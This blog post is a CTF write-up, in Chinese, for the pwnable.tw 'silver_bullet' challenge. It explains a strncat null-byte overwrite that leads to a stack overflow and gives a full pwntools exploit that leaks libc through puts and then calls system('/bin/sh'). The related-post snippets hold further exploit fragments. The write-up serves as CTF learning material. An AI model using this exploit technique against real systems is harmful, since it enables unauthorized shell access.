【tw】silver_bullet

最新推荐文章于 2024-03-18 09:38:19 发布
最新推荐文章于 2024-03-18 09:38:19 发布
阅读量195 收藏
点赞数
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43960998/article/details/113826438
版权

程序与利用

create 函数如下:

向 s 中读取字节,这个传进来的 s 在main函数栈帧的如下位置:
在这里插入图片描述
s + 48 处存放了这段字符的长度。
power up 函数如下:
在这里插入图片描述
这里有一个非常重要的函数 strncat():

char *strncat(char *dest, const char *src, size_t n)

这个函数是把 src 指向的字符串追加到 dest 字符串的结尾,直到 n 字符长度为止。如果 src 字符串的长度不足 n 则全部追加,如果超过 n 则只追加前 n 个字符。但是无论哪种情况都会在最终的字符串结尾加上空字符
而这个函数中的逻辑是先追加,然后计算 v3,其中*(dest + 12) 恰好在追加最长字符的末尾,也就是说通过追加字符可以将该值覆盖为 0,那么 v3 的值一定 < 0x2f,所以通过这种方式就可以继续追加,然后覆盖到下面的返回地址。此时栈的结构如下:

地址内容
ebp - 0x34s
ebp - 0x4len(s)
ebpebp
ebp+0x4返回地址

因为程序处于一个循环中,所以想 return 则必须进入下面这个函数并使返回值满足条件:
在这里插入图片描述
其中的条件如下图,所以此时将 len(s) 的值覆盖为大于 *a2 的值即可:
在这里插入图片描述

第一次可以利用溢出泄漏 libc_base,将返回地址覆盖为 main 函数:

# get libc_base
des = 'a'*40
add(des)
des = 'b'*8
cat(des)
pl = '\xff'*3 + '\xff'*4 + p32(puts_plt) + p32(main) + p32(puts_got)
cat(pl)
cmd(3)
ru("Oh ! You win !!\n")
addr = u32(p.recvuntil("\n", drop=True).ljust(4, '\x00'))

此时栈上:
在这里插入图片描述
接收 puts 地址获得 libc_base,尝试过 read 没成功的原因是在我本机 libc 中其地址末位即小端序的第一位为 \x00,所以没能泄漏,所以下次遇到 payload 没问题但是没泄漏的情况考虑一下是不是其地址的问题。
然后进行第二次利用直接将返回地址修改到 system("/bin/sh");

# system("/bin/sh")
des = 'a'*40
add(des)
des = 'b'*8
cat(des)

pl = '\xff'*3 + '\xff'*4 + p32(system) + p32(main) + p32(bin_sh)
cat(pl)
cmd(3)

此时栈上,return 即完成利用:
在这里插入图片描述

完整exp

#encoding=utf-8
from pwn import *

p = process("./silver_bullet")
# p = remote("chall.pwnable.tw", 10103)
elf = ELF("./silver_bullet")
# libc = ELF("./libc_32.so.6")
libc = elf.libc

context(log_level = 'debug')
DEBUG = 1
if DEBUG:
	gdb.attach(p, 
	'''	
	b *0x08048935
	c
	''')

def dbg():
    gdb.attach(p)
    pause()

se      = lambda data               :p.send(data) 
sa      = lambda delim,data         :p.sendafter(delim, data)
sl      = lambda data               :p.sendline(data)
sla     = lambda delim,data         :p.sendlineafter(delim, data)
rc      = lambda num          		:p.recv(num)
rl      = lambda                    :p.recvline()
ru      = lambda delims             :p.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\x00'))	
uu64    = lambda data               :u64(data.ljust(8, '\x00'))
info    = lambda tag, addr          :log.info(tag + " -> " + hex(addr))
ia		= lambda                    :p.interactive()

menu = "Your choice :"
def cmd(idx):
	ru(menu)
	sl(str(idx))

def add(des):
	cmd(1)
	ru("description of bullet :")
	se(des)

def cat(des):
	cmd(2)
	ru("description of bullet :")
	se(des)

read_got = elf.got['read']
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main = 0x08048954

# get libc_base
des = 'a'*40
add(des)
des = 'b'*8
cat(des)

pl = '\xff'*3 + '\xff'*4 + p32(puts_plt) + p32(main) + p32(puts_got)
cat(pl)
cmd(3)
ru("Oh ! You win !!\n")
addr = u32(p.recvuntil("\n", drop=True).ljust(4, '\x00'))
info("addr", addr)

libc_base = addr - libc.symbols['puts']
system = libc_base + libc.symbols['system']
bin_sh = libc_base + libc.search("/bin/sh").next()

# system("/bin/sh")
des = 'a'*40
add(des)
des = 'b'*8
cat(des)

pl = '\xff'*3 + '\xff'*4 + p32(system) + p32(main) + p32(bin_sh)
cat(pl)
cmd(3)
ru("Oh ! You win !!\n")

ia()

在这里插入图片描述

知识点

  • strncat() 函数
、皮皮鸭
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
silver bullet记录
weixin_55190422的博客
11-30 2472
老套路检查一下 没开canary和pie,只开了NX。所以我们用ROP ret2libc.我们运行程序发现,这个程序需要我们赢这个游戏他才能ret,就是beat非0。通过先creat再powerup泄露基地址,然后ret2libc进行ROP。 EXP: from pwn import * p = remote("chall.pwnable.tw", 10103) e = ELF("./silver_bullet") l = ELF("./libc_32.so.6") context.log...
pwnable.tw 1~5 心累
qq_42192672的博客
12-02 600
听说很难,来找虐 1.Start [100 pts] 之前湖湘杯有一题啥防护措施都没开启,我就不会做,所以不敢开心的太早 拖进IDA,这啥东西 还是直接看汇编吧 这是个系统调用 大概就是系统中断之后直接调用吧,边上有注释,不然我直接凉了 来,看一下汇编 先把地址给ecx,给了给长度范围,饭后执行标准输出,输出到终端,然后执行操作 进入函数以后,标准读入,长度还是2...
pwnable.tw Silver_Bulllet write up
qq_43189757的博客
10-30 198
程序保护: 程序逻辑分析: 1.创建银弹 在create_bullet 函数中输入得字符串得长度为银弹的power大小, 最大为0x30, 只能创建一次 &s -> &s + 48 存放字符串 &s + 48 存放power大小 2.Power 提升 如果银弹已被创建并且银弹的大小小于0x30, 那么可以提升银弹的power直至上限0x30 漏洞点: 漏洞点...
pwnable.tw silver_bullet
weixin_30361641的博客
03-30 167
产生漏洞的原因 int __cdecl power_up(char *dest) { char s; // [esp+0h] [ebp-34h] size_t new_len; // [esp+30h] [ebp-4h] new_len = 0; memset(&s, 0, 0x30u); if ( !*dest ) return put...
tw】Tcache_tear
weixin_43960998的博客
02-17 270
程序 add 功能: 这里面调用了 my_read() 函数: 在 add 中 size 是一个有符号的整数,但是这个函数接收的参数是一个无符号的整数,当有符号数和无符号数进行比较时都会转成无符号数,所以,当 size < 0x10 时结果为负数,传进这个函数就是一个非常大的数导致溢出。 show 功能只能打印 name 处的数据: 所以想到看看能不能把 name 处放进堆链表中进入 unsorted bin 泄漏 libc。 free 功能存在 uaf: name 和存放指针的全局变量 pt
个人知识管理平台SilverBullet
最新发布
wbsu2004的博客
03-18 8863
SilverBullet 是一个可扩展的开源个人知识平台,号称是黑客的笔记本。
PWNABLE.TW(1)
njh18790816639的博客
12-30 280
Start from pwn import * context(log_level='debug',os='linux',arch='i386') binary = './start' r = remote('chall.pwnable.tw', 10000) #r = process(binary) elf = ELF(binary) def db(): gdb.attach(r) leak_esp = 0x08048087 shellcode = asm("xor ecx,ecx;\
no_silver_bullet
04-10
### No Silver Bullet: Essence and Accidents of Software Engineering #### 引言 《No Silver Bullet: Essence and Accidents of Software Engineering》是由Frederick P. Brooks Jr.撰的一篇经典论文,该论文...
obj_C++_bullet_
10-03
在本项目中,"obj_C++_bullet_" 主要涉及两个关键知识点:C++编程语言和Bullet物理引擎。Bullet是一个开源的3D物理模拟库,广泛应用于游戏开发、动画制作和仿真等领域。而`.obj`文件是一种常见的3D模型格式,用于...
3DGame.rar_bullet_tank 3d
09-14
3d model of a tank can be achieved scene map, firing bullets. A complete model tanks and bullet models. You can move and attack itself can be rotated
openbullet-master_openbullet_coding_bullet_
10-02
《OpenBullet:官方开源软件详解》 OpenBullet是一款强大的自动化数据抓取和处理工具,尤其在网络爬虫领域中有着广泛的应用。它以其开源、易用的特点,深受开发者和数据分析人员的喜爱。本文将深入探讨OpenBullet的...
Magic_Bullet_Looks_CN.zip
12-22
《Magic Bullet Looks CN:EDIUS调色神器的深度解析》 在数字视频编辑领域,色彩校正和调色是提升影片视觉效果的关键步骤。而Magic Bullet Looks CN正是这样一款专为EDIUS用户设计的调色插件,它以其丰富的色彩预设...
【pwn】orw
weixin_43960998的博客
06-19 1777
本文分为两部分,一部分是2.27及一下的 setcontext + orw,一部分是 2.29 及以上的 setcontext + orw。 利用条件 2.27: 开了沙箱 uaf 等控制 free_hook 一、2.27 libc 2.27及以下的 setcontext: 给各寄存器传参分别由 rdi 来完成,一般的套路是线泄漏 libc 和 heap_base,我们把某一个 chunk 填充为: frame = SigreturnFrame() frame.rsp = libc.sym['__fr
【攻防世界】greeting-150
weixin_43960998的博客
03-28 1305
1.程序逆向 main 函数非常简单,存在一个只能利用一次的格式化字符串。 自定义 getnline 函数: 存在一个奇怪的函数,提供了 system,但是没用 /bin/sh : 2.前置知识 当程序中的漏洞只能利用一次,但是我们需要利用多次时,可以考虑修改 .fini_array,这里引用了参考文章的图: (图源 https://bbs.ichunqiu.com/thread-43624-1-1.html) 程序退出后会依次 .fini_array 中的每一个函数指针,那如果把 start 或者
【攻防世界】Recho
weixin_43960998的博客
03-28 677
1.程序逆向 简单,略 2.漏洞利用 这道题想了半天,没想明白怎么退出循环,所以看了 ha1vk 师傅博客,学习了一波。 退出循环主要是利用 pwntools 提供的一个功能:shutdown。这个功能可以关闭流,这样就可以退出循环了。     因为对于有些系统,system 可以用系统调用,但是有些不行,所以这里采用 orw 的方式读取 flag。 shift + f12 可以看到 flag 字符串,所以也可能是提示我们。 题目中有了 read,write 可以使用
【glibc2.29】新增保护机制
weixin_43960998的博客
02-17 541
新增防护机制 1、free 1.1、tcache 通过注释可以看到新增的 key 是为了检测 double free 的。 e->key=tcache,这个 tcache 就是: 也就是 tcache_perthread_struct 的地址,在调试中也就是这里: 即: 循环遍历 tcache 链表上所有的 chunk 进行对比,所以 tcache 的 double free 挂了。但是由于 tcache 的特性,他的利用还是要比其他 bins 方便很多。 绕过方式:根据上图,只有当key和t
【kernel pwn】(壹)初探
weixin_43960998的博客
03-18 512
1.环境搭建 只需要安装一个qemu就好了: sudo apt-get install qemu 2.准备工作 一般kernel题目会给一些文件,分别是boot.sh,bzImage,rootfs.cpio,分别是启动脚本,内核映像,根文件系统映像。题中所给的 rootfs.cpio 一般先是一个压缩包,需要重命名后解压出真正的文件目录,这里参考 cnitlrt师傅的文章给出一些常用脚本: 首先是解包脚本: #!/bin/bash mv $1 $1.gz unar $1.gz mv $1 core mv
【笔记】pwn模板
weixin_43960998的博客
02-21 511
今天在一个师傅博客中学到了一种当本地 libc 和远程 libc 不一样,调试和 getshell 之间需要切换的情况下,这种模板就会很简单。拿过来结合自己之前用的如下: from pwn import * import sys context.log_level = "debug" elf = ELF("./pwn") if sys.argv[1] == "process": p = process("./pwn") libc = ELF("/lib/x86_64-linux-gnu/li
GEN_BULLET_EVENT = pygame.USEREVENT + 2 pygame.time.set_timer(GEN_BULLET_EVENT, 1000)
06-04
这两行代码的作用是创建一个自定义事件 GEN_BULLET_EVENT,并设置一个定时器,用于触发该事件。具体来说,第一行代码使用 Pygame 中的 USEREVENT 常量加 2 来创建了一个自定义事件 GEN_BULLET_EVENT。在 Pygame 中,USEREVENT 是一个常量,表示用户自定义事件的起始编号,因此我们可以通过将 USEREVENT 常量加 2 来创建一个新的自定义事件。在这个例子中,我们创建了一个名为 GEN_BULLET_EVENT 的自定义事件。 第二行代码使用 Pygame 中的 time 模块中的 set_timer() 函数来设置定时器。具体来说,该函数的第一个参数是要设置的定时器事件,即 GEN_BULLET_EVENT。第二个参数是时间间隔,这里是 1000 毫秒,也就是每隔 1 秒钟就会触发一次 GEN_BULLET_EVENT 事件,并将其添加到事件队列中。在后续代码中,我们可以通过处理 GEN_BULLET_EVENT 事件来实现生成子弹的逻辑。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值